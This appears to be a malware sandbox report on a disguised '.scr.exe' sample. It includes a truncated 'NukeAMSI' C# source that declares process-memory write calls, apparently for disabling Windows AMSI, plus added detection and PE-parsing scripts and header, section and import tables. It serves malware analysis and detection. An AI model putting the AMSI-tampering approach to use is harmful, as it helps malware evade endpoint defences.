                                                                                                                                                                                      Preview:.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class NukeAMSI..{.. public const int PROCESS_VM_OPERATION = 0x0008;.. public const int PROCESS_VM_READ = 0x0010;.. public const int PROCESS_VM_WRITE = 0x0020;.. public const uint PAGE_EXECUTE_READWRITE = 0x40;.... // NtOpenProcess: Opens a handle to a process... [DllImport("ntdll.dll")].. public static extern int NtOpenProcess(out IntPtr ProcessHandle, uint DesiredAccess, [In] ref OBJECT_ATTRIBUTES ObjectAttributes, [In] ref CLIENT_ID ClientId);.... // NtWriteVirtualMemory: Writes to the memory of a process... [DllImport("ntdll.dll")].. public static extern int NtWriteVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] Buffer, uint NumberOfBytesToWrite, out uint NumberOfBytesWritten);.... // NtClose: Closes an open handle... [DllImport("ntdll.dll")].. public static extern int NtClose(IntPtr Handle);.... // LoadLibrary: Loads the specified mod
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):371
                                                                                                                                                                                      Entropy (8bit):5.298527197052455
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923f19B0zxs7+AEszI923f19b:p37Lvkmb6Kz99B0WZE299b
                                                                                                                                                                                      MD5:FC074B0B33654F2D7CB8996FC9C40642
                                                                                                                                                                                      SHA1:40E7348AB24E34F0D80D0A514FDC5E3B367B65B7
                                                                                                                                                                                      SHA-256:31C021DE67A5C3A5EC465BCA39BD887D345776FD00D6F68D0660021F9E642A49
                                                                                                                                                                                      SHA-512:02A5B2A1EA1A88DB4F30C741C605D07CA8557163F38918EF4F8BA88030EB98F2FA41229EDFD77CFDADF37501FA01FF91D170222122087B897262DE8FD42875D0
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.0.cs"
                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4096
                                                                                                                                                                                      Entropy (8bit):3.6184614094443277
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:6TfOVuHIbGzo4QLXNJGhjRbd7lzm8DuJNL6+Y1ulva3jq:8OV/K2Ny7Jm++L9K
                                                                                                                                                                                      MD5:E7449CF261D6DAADBBEF212361658FB7
                                                                                                                                                                                      SHA1:6906B4B6DFE93CC1E40F3746A560542EE5430155
                                                                                                                                                                                      SHA-256:C1A68D0188CBE53883008C8420901DB2261D961E78E4F0D13413EF9306EC9A1E
                                                                                                                                                                                      SHA-512:F92DE0408A69522A590BBB1215174BA74AA52EF7E3A9E6CC8801E292730C8C8FDD1DA1FD57A96CCE834FB76CBF1C23F077721D364B2072C863C9D85E5C801A83
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................'... ...@....... ....................................@.................................8'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p'......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......0...#Strings....0.......#US.8.......#GUID...H.......#Blob...........W.........%3........................................................................L.E...S.E.................}.....}...............$................................... .............2.........V.]...V.r...V.....V...............Z.....Z...'.....2.Z...E.Z...^.Z...l.Z........ ..$.........
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                                                                                                                                                                      Category:modified
                                                                                                                                                                                      Size (bytes):872
                                                                                                                                                                                      Entropy (8bit):5.33106873014329
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:KMoId3ka6Kz99XE299aKax5DqBVKVrdFAMBJTH:dokka6a9xE29oK2DcVKdBJj
                                                                                                                                                                                      MD5:503EAA53B8A1E143E5B1FAD02345C990
                                                                                                                                                                                      SHA1:BF985F350BC686F04383C79AC288BE778A30C051
                                                                                                                                                                                      SHA-256:74DA0F374E3CE1F82316241D40EF04F15FC0B6B9E648B6021C9A823FFFBE63F2
                                                                                                                                                                                      SHA-512:C5A5ACA9CF57178A33B0C61F51D1232669D44DB7808AAF2EB71C4989A3D17984278959D722C8E70D0D20C4AC43F3200A48BF11A0986AD53F5565CC5A704CD1EC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
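The three dropped artefacts above (the NukeAMSI C# source, the csc.exe command line writing xy2h0pkm.dll into AppData\Local\Temp, and the compiler output) are the on-disk trace of a PowerShell Add-Type call. Every Add-Type with C# source produces exactly this csc.exe pattern, so a process-creation rule alone fires on benign admin scripts as well; what separates this sample is the content of the compiled source (ntdll P/Invoke declarations for opening and writing another process's memory, and an "AMSI" class name). The following is an added example written for this page, not Joe Sandbox's, Sigma's or the sample's own code: stage 1 re-implements the idea of the "Dot net compiler compiles file from suspicious location" detection (not the published rule text) over Sysmon-style events, and stage 2 scores the dropped .cs text. Field names (Image, ParentImage, CommandLine), the indicator weights and the threshold are assumptions; the second event reuses the csc command line from the report, the other events and the benign helper source are constructed.

```python
"""Two-stage triage of csc.exe spawned by PowerShell (Add-Type) plus a keyword score
of the compiled .cs source. Added example for this page; not Joe Sandbox's, Sigma's
or the sample's own code. Field names follow Sysmon event ID 1; the indicator
weights and TAMPER_THRESHOLD are assumptions."""
import re

TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\users\\public\\")
OUT_RE = re.compile(r'/out:"?([^"\s]+)"?', re.I)       # compiler output path
SRC_RE = re.compile(r'"?([^"\s]+\.cs)"?\s*$', re.I)    # trailing .cs argument
TAMPER_THRESHOLD = 6

# Stage 2 indicators: things a process-memory patcher needs and an ordinary
# P/Invoke helper does not. Weights are assumptions.
SOURCE_INDICATORS = {
    r"\bNtOpenProcess\b|\bOpenProcess\b": 2,
    r"\bNtWriteVirtualMemory\b|\bWriteProcessMemory\b": 3,
    r"\bNtProtectVirtualMemory\b|\bVirtualProtect(Ex)?\b": 2,
    r"PAGE_EXECUTE_READWRITE": 1,
    r"amsi": 3,
    r'DllImport\("ntdll\.dll"\)': 1,
}


def csc_from_powershell(ev):
    """Stage 1: /out and source paths if csc.exe or vbc.exe was started by a
    PowerShell host and writes its assembly into a temp directory, else None."""
    if not ev["Image"].lower().endswith(("\\csc.exe", "\\vbc.exe")):
        return None
    if not ev["ParentImage"].lower().endswith(
            ("\\powershell.exe", "\\pwsh.exe", "\\powershell_ise.exe")):
        return None
    out = OUT_RE.search(ev["CommandLine"])
    if not out or not any(d in out.group(1).lower() for d in TEMP_DIRS):
        return None
    src = SRC_RE.search(ev["CommandLine"])
    return {"out": out.group(1), "source": src.group(1) if src else None}


def score_source(cs_text):
    """Stage 2: (score, matched patterns) for a C# source text."""
    hits = [p for p in SOURCE_INDICATORS if re.search(p, cs_text, re.I)]
    return sum(SOURCE_INDICATORS[p] for p in hits), hits


def triage(ev, dropped_sources):
    """Combine both stages; dropped_sources maps .cs path -> recovered text.
    Returns None when stage 1 does not fire."""
    hit = csc_from_powershell(ev)
    if hit is None:
        return None
    score, hits = score_source(dropped_sources.get(hit["source"], ""))
    hit["score"], hit["indicators"] = score, hits
    hit["verdict"] = "memory-patch tooling" if score >= TAMPER_THRESHOLD else "review"
    return hit


CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_SRC = r"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.0.cs"
ADMIN_SRC = r"C:\Users\admin\AppData\Local\Temp\ab12cd34\ab12cd34.0.cs"

# Constructed events. EVENTS[1] carries the csc command line from the report;
# EVENTS[0] (a Visual Studio build) and EVENTS[2] (an admin's Add-Type) are invented.
EVENTS = [
    {"Image": CSC,
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "CommandLine": r'csc.exe /noconfig /out:"C:\src\app\bin\Release\app.dll" "C:\src\app\Program.cs"'},
    {"Image": CSC, "ParentImage": PS,
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output '
                    r'/R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation'
                    r'\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" '
                    r'/out:"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.dll" /debug- /optimize+ '
                    r'/warnaserror /optimize+ "' + SAMPLE_SRC + '"'},
    {"Image": CSC, "ParentImage": PS,
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library '
                    r'/out:"C:\Users\admin\AppData\Local\Temp\ab12cd34\ab12cd34.dll" "' + ADMIN_SRC + '"'},
]

# Source texts as recovered from the dropped-files list: the first is transcribed from
# the NukeAMSI preview above (declarations only), the second is a constructed benign helper.
DROPPED_SOURCES = {
    SAMPLE_SRC: '''using System;
using System.Runtime.InteropServices;
public class NukeAMSI
{
    public const int PROCESS_VM_OPERATION = 0x0008;
    public const int PROCESS_VM_WRITE = 0x0020;
    public const uint PAGE_EXECUTE_READWRITE = 0x40;
    [DllImport("ntdll.dll")]
    public static extern int NtOpenProcess(out IntPtr ProcessHandle, uint DesiredAccess,
        [In] ref OBJECT_ATTRIBUTES ObjectAttributes, [In] ref CLIENT_ID ClientId);
    [DllImport("ntdll.dll")]
    public static extern int NtWriteVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress,
        byte[] Buffer, uint NumberOfBytesToWrite, out uint NumberOfBytesWritten);
    [DllImport("ntdll.dll")]
    public static extern int NtClose(IntPtr Handle);
}''',
    ADMIN_SRC: '''using System;
using System.Runtime.InteropServices;
public class Win32
{
    [DllImport("user32.dll")]
    public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
}''',
}

if __name__ == "__main__":
    for ev in EVENTS:
        print(triage(ev, DROPPED_SOURCES))
```

Stage 1 fires for both PowerShell-spawned compilations, which is the expected noise level of the process rule; only the sample's source crosses the threshold, because of the ntdll NtOpenProcess/NtWriteVirtualMemory pair, the RWX constant and the class name. In a real pipeline the source text comes from the .cs file in the temp directory (it is deleted after compilation, so it must be collected by the EDR or, as here, from the sandbox's dropped-files list).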
                                                                                                                                                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                      Entropy (8bit):7.828920939297905
                                                                                                                                                                                      TrID:
                                                                                                                                                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                      File name:Terms_of_reference_06_01_2025_samsung.scr.exe
                                                                                                                                                                                      File size:38'551'524 bytes
                                                                                                                                                                                      MD5:c364bcdca858dbb480e269b7c0c0dedc
                                                                                                                                                                                      SHA1:2251325091ef30f44e9bc716d995749a803f249e
                                                                                                                                                                                      SHA256:0e6e34d9db771d5f81f2329150f9b71498feeca06dd764c59a0a4b43b16eed18
                                                                                                                                                                                      SHA512:ec6d3b60a7427d542d1b9068663fc2efab603eed435c1b622126454e47b5b66f89ec5fb9956656afe3a74d3eccd9515f9fdc4397c6491e5df7aeca7dfda6c946
                                                                                                                                                                                      SSDEEP:786432:ibn84L7CLACWJv+ASDON6r8hp7jkHA46coubBERVkUieOR:ib84L7yu2ASy/7nozVEIlt
                                                                                                                                                                                      TLSH:65871256E2FD00D8E4BAC0B8C6575627EBB27455133097EB62608A692F33BE06F7D311
                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y..N8.DN8.DN8.DG@vDX8.D...EZ8.D...E\8.D...E.8.D>..EF8.D>..EC8.DN8.DF:.D]..E[8.D]..E.:.D]..EO8.D]..DO8.D]..EO8.DRichN8.D.......
                                                                                                                                                                                      Icon Hash:0544801b6464f40b
                                                                                                                                                                                      Entrypoint:0x1405cfe90
                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                      Imagebase:0x140000000
                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                      Time Stamp:0x67115F21 [Thu Oct 17 19:01:53 2024 UTC]
                                                                                                                                                                                      TLS Callbacks:0x405cf310, 0x1, 0x405cfad0, 0x1
                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                      Import Hash:4b1892ce4fbcfcf064c6f69d693fc6a5
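The static fields above (time stamp, entry point, image base, subsystem, OS version, file and DLL characteristics, empty CLR version) all come straight from the COFF and optional headers, and checking them yourself is the first thing to do when a report's numbers look odd. The following is an added example written for this page, not Joe Sandbox's own parser: a minimal PE32/PE32+ header reader that reproduces those fields. The header bytes it parses are constructed here to carry the values the report lists for this sample (the real file is 38 MB and is not reproduced); pass a real file's bytes to parse_pe_headers() to do the same on disk. The flag and subsystem names follow the PE specification; the sample's section table, imports and sections are omitted, so the import hash cannot be derived from this stub.

```python
"""Minimal PE header parser that re-derives the static fields a sandbox report lists.
Added example for this page, not Joe Sandbox's own code. build_sample_header()
constructs header bytes with this sample's reported values; it is not the real file."""
import struct
from datetime import datetime, timezone

DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
FILE_CHARACTERISTICS = {0x0002: "EXECUTABLE_IMAGE", 0x0020: "LARGE_ADDRESS_AWARE",
                        0x2000: "DLL"}
SUBSYSTEMS = {1: "native", 2: "windows gui", 3: "windows cui"}
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14   # CLR header; non-empty only for .NET images


def flags(value, table):
    """Names of the bits set in value, in ascending bit order."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe_headers(data):
    """DOS header -> PE signature -> COFF header -> optional header (PE32 or PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, _nsect, ts, _, _, _opt_size, fchars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20                                  # COFF header is 20 bytes
    pe32plus = struct.unpack_from("<H", data, opt)[0] == 0x20B
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    if pe32plus:                                     # ImageBase is 8 bytes at +24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
        ndirs_off, dirs_off = opt + 108, opt + 112
    else:                                            # PE32: BaseOfData at +24, ImageBase at +28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
        ndirs_off, dirs_off = opt + 92, opt + 96
    os_major, os_minor = struct.unpack_from("<HH", data, opt + 40)
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    ndirs = struct.unpack_from("<I", data, ndirs_off)[0]
    clr_rva = clr_size = 0
    if ndirs > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR:
        clr_rva, clr_size = struct.unpack_from(
            "<II", data, dirs_off + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR)
    return {
        "machine": machine,
        "pe32plus": pe32plus,
        "timestamp": datetime.fromtimestamp(ts, tz=timezone.utc),
        "entrypoint": image_base + entry_rva,        # VA, as the report prints it
        "imagebase": image_base,
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "os_version": (os_major, os_minor),
        "file_characteristics": flags(fchars, FILE_CHARACTERISTICS),
        "dll_characteristics": flags(dll_chars, DLL_CHARACTERISTICS),
        "is_dotnet": clr_rva != 0 and clr_size != 0,
    }


def build_sample_header():
    """Constructed PE32+ headers (no sections) carrying the values reported for this
    sample: entry RVA 0x5CFE90, image base 0x140000000, stamp 0x67115F21, GUI subsystem,
    DLL characteristics HIGH_ENTROPY_VA|DYNAMIC_BASE|NX_COMPAT|GUARD_CF|TERMINAL_SERVER_AWARE."""
    e_lfanew = 0x80
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    dos += b"\0" * (e_lfanew - len(dos))
    ndirs = 16
    opt = struct.pack("<HBBIIIII", 0x20B, 14, 0, 0, 0, 0, 0x5CFE90, 0x1000)
    opt += struct.pack("<QII", 0x140000000, 0x1000, 0x200)          # ImageBase, alignments
    opt += struct.pack("<HHHHHHI", 6, 0, 6, 0, 6, 0, 0)             # OS/image/subsystem versions
    opt += struct.pack("<III", 0x1000, 0x400, 0)                    # SizeOfImage, SizeOfHeaders, CheckSum
    opt += struct.pack("<HH", 2, 0x0020 | 0x0040 | 0x0100 | 0x4000 | 0x8000)
    opt += struct.pack("<QQQQII", 0x100000, 0x1000, 0x100000, 0x1000, 0, ndirs)
    opt += b"\0" * (8 * ndirs)                                      # all directories empty, incl. CLR
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0x67115F21, 0, 0, len(opt), 0x0002 | 0x0020)
    return dos + b"PE\0\0" + coff + opt


if __name__ == "__main__":
    for k, v in parse_pe_headers(build_sample_header()).items():
        print(f"{k}: {v:#x}" if isinstance(v, int) and not isinstance(v, bool) else f"{k}: {v}")
```

Two checks worth reading off the result: the entry point is image base plus RVA (0x140000000 + 0x5CFE90 = 0x1405CFE90, matching the report), and the CLR directory is empty, which is why the "CLR (.Net) Version" field above is blank even though the sample later drives csc.exe through PowerShell. The time stamp is a plain 32-bit epoch value, so a value that decodes to a date after the sample was first seen, or to 1970, is worth noting as a tampered or reproducible-build stamp.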
Instruction
dec eax
sub esp, 28h
call 00007F1794B8BEC8h
dec eax
add esp, 28h
jmp 00007F1794B8B80Fh
int3
int3
dec eax
sub esp, 28h
call 00007F179487A3A8h
jmp 00007F1794B8B9A4h
xor eax, eax
dec eax
add esp, 28h
ret
int3
int3
jmp 00007F1794B8B98Ch
int3
int3
int3
dec eax
mov dword ptr [esp+10h], ebx
dec eax
mov dword ptr [esp+18h], esi
push ebp
push edi
inc ecx
push esi
dec eax
mov ebp, esp
dec eax
sub esp, 10h
xor eax, eax
xor ecx, ecx
cpuid
inc esp
mov eax, ecx
inc esp
mov edx, edx
inc ecx
xor edx, 49656E69h
inc ecx
xor eax, 6C65746Eh
inc esp
mov ecx, ebx
inc esp
mov esi, eax
xor ecx, ecx
mov eax, 00000001h
cpuid
inc ebp
or edx, eax
mov dword ptr [ebp-10h], eax
inc ecx
xor ecx, 756E6547h
mov dword ptr [ebp-0Ch], ebx
inc ebp
or edx, ecx
mov dword ptr [ebp-08h], ecx
mov edi, ecx
mov dword ptr [ebp-04h], edx
jne 00007F1794B8B9FDh
dec eax
or dword ptr [001CA17Dh], FFFFFFFFh
and eax, 0FFF3FF0h
dec eax
mov dword ptr [001CA165h], 00008000h
cmp eax, 000106C0h
je 00007F1794B8B9CAh
cmp eax, 00020660h
je 00007F1794B8B9C3h
cmp eax, 00020670h
je 00007F1794B8B9BCh
add eax, FFFCF9B0h
cmp eax, 20h
jnbe 00007F1794B8B9C6h
dec eax
mov ecx, 00010001h
Programming Language:
• [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x7966f0 | 0xc4 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7967b4 | 0x168 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x807000 | 0x157bb0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x7ba000 | 0x360fc | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x95f000 | 0x7e2c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x70a6b0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x70a880 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x624540 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x61d000 | 0xec8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x7964a4 | 0x60 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x61a71c | 0x61a800 | 0b10188502e90294dafc4ec1ab7c7e1a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.CLR_UEF | 0x61c000 | 0xdd | 0x200 | 3e60305f40e8c29615347b62e95ffa2c | False | 0.4140625 | zlib compressed data | 3.093020747643803 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x61d000 | 0x17c5e2 | 0x17c600 | ccea3fd4e581a51a1f647847625a49ad | False | 0.4178410234554716 | data | 5.662369206074474 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x79a000 | 0x1ffc4 | 0x9800 | 299802f418a9035333b55e293f49d1d4 | False | 0.19793379934210525 | data | 3.334456628912645 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x7ba000 | 0x360fc | 0x36200 | fd626080e4e3733af1f84cb0f28f455d | False | 0.5045602987875288 | data | 6.505480901328782 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.didat | 0x7f1000 | 0x38 | 0x200 | 910157a66b34b7706f92927705a37f5a | False | 0.064453125 | data | 0.42449845906755646 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Section | 0x7f2000 | 0x8 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
_RDATA | 0x7f3000 | 0x13208 | 0x13400 | 617430a8cd708dda1865fee2910d8a1a | False | 0.18454494724025974 | data | 5.4827244286074395 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x807000 | 0x157bb0 | 0x157c00 | de7e28b9db66801685543e24971703a5 | False | 0.4153728693181818 | data | 6.305049331993507 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x95f000 | 0x7e2c | 0x8000 | dca4e44fa2a43d7401fa4c38300ecb87 | False | 0.155853271484375 | data | 5.445611795477199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x807200 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 80630 x 80630 px/m | | | 0.0639417958121377
RT_RCDATA | 0x817a28 | 0x24 | data | | | 1.1666666666666667
RT_RCDATA | 0x817a4c | 0x24 | data | | | 1.1666666666666667
RT_RCDATA | 0x817a70 | 0x146c10 | PE32+ executable (DLL) (GUI) x86-64, for MS Windows | | | 0.4392890930175781
RT_GROUP_ICON | 0x95e680 | 0x14 | data | | | 1.15
RT_VERSION | 0x95e694 | 0x2c0 | data | | | 0.4318181818181818
RT_MANIFEST | 0x95e954 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
KERNEL32.dll | RaiseException, FreeLibrary, SetErrorMode, RaiseFailFastException, GetExitCodeProcess, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, AddVectoredExceptionHandler, MultiByteToWideChar, GetTickCount, FlushInstructionCache, QueryPerformanceFrequency, QueryPerformanceCounter, RtlLookupFunctionEntry, LocateXStateFeature, RtlDeleteFunctionTable, InterlockedPushEntrySList, InterlockedFlushSList, InitializeSListHead, GetTickCount64, DuplicateHandle, QueueUserAPC, WaitForSingleObjectEx, SetThreadPriority, GetThreadPriority, GetCurrentThreadId, TlsAlloc, GetCurrentThread, GetCurrentProcessId, CreateThread, GetModuleHandleW, WaitForMultipleObjectsEx, SignalObjectAndWait, RtlCaptureContext, SetThreadStackGuarantee, VirtualQuery, WriteFile, GetStdHandle, GetConsoleOutputCP, MapViewOfFileEx, UnmapViewOfFile, GetStringTypeExW, InterlockedPopEntrySList, ExitProcess, Sleep, CreateMemoryResourceNotification, VirtualAlloc, VirtualFree, VirtualProtect, SleepEx, SwitchToThread, SuspendThread, ResumeThread, InitializeContext, SetXStateFeaturesMask, RtlRestoreContext, CloseThreadpoolTimer, CreateThreadpoolTimer, SetThreadpoolTimer, ReadFile, GetFileSize, GetEnvironmentVariableW, SetEnvironmentVariableW, CreateEventW, SetEvent, ResetEvent, GetThreadContext, SetThreadContext, GetEnabledXStateFeatures, CopyContext, WerRegisterRuntimeExceptionModule, RtlInstallFunctionTableCallback, GetSystemDefaultLCID, GetUserDefaultLCID, RtlUnwind, HeapAlloc, HeapFree, GetProcessHeap, HeapCreate, HeapDestroy, GetEnvironmentStringsW, FreeEnvironmentStringsW, FormatMessageW, CreateSemaphoreExW, ReleaseSemaphore, GetACP, LCMapStringEx, LocalFree, VerSetConditionMask, VerifyVersionInfoW, QueryThreadCycleTime, GetLogicalProcessorInformationEx, SetThreadGroupAffinity, GetThreadGroupAffinity, GetProcessGroupAffinity, GetCurrentProcessorNumberEx, GetProcessAffinityMask, QueryInformationJobObject, CloseHandle, GetSystemTimeAsFileTime, GetModuleFileNameW, CreateProcessW, GetCPInfo, LoadLibraryExW, CreateFileW, GetFileAttributesExW, GetFullPathNameW, LoadLibraryExA, OutputDebugStringA, OpenEventW, ReleaseMutex, ExitThread, CreateMutexW, HeapReAlloc, CreateNamedPipeA, WaitForMultipleObjects, DisconnectNamedPipe, CreateFileA, CancelIoEx, GetOverlappedResult, ConnectNamedPipe, FlushFileBuffers, SetFilePointer, MapViewOfFile, GetActiveProcessorGroupCount, GetSystemTime, SetConsoleCtrlHandler, GetLocaleInfoEx, GetUserDefaultLocaleName, RtlAddFunctionTable, LoadLibraryW, CreateDirectoryW, RemoveDirectoryW, CreateActCtxW, ActivateActCtx, FindResourceW, GetWindowsDirectoryW, GetFileSizeEx, FindFirstFileExW, FindNextFileW, GetTempPathW, FindClose, 